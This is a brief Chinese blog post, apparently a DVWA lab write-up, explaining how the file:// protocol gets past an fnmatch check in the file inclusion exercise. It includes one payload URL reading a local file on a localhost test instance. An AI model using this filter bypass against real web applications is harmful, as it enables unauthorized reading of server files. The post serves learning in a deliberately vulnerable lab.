版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_36869808/article/details/84076992
0x00 前言
如饥似渴的学习ing。
你可能需要看看:
https://blog.csdn.net/qq_36869808/article/details/83029980
0x01 start
还是来直接看源码吧
fnmatch
这里要求必须要使用file来进行访问,但是这里可以用file协议来进行绕过
payload:
http://127.0.0.1/DVWA-master/vulnerabilities/fi/?page=file://F:\phpStudy\WWW\php.txt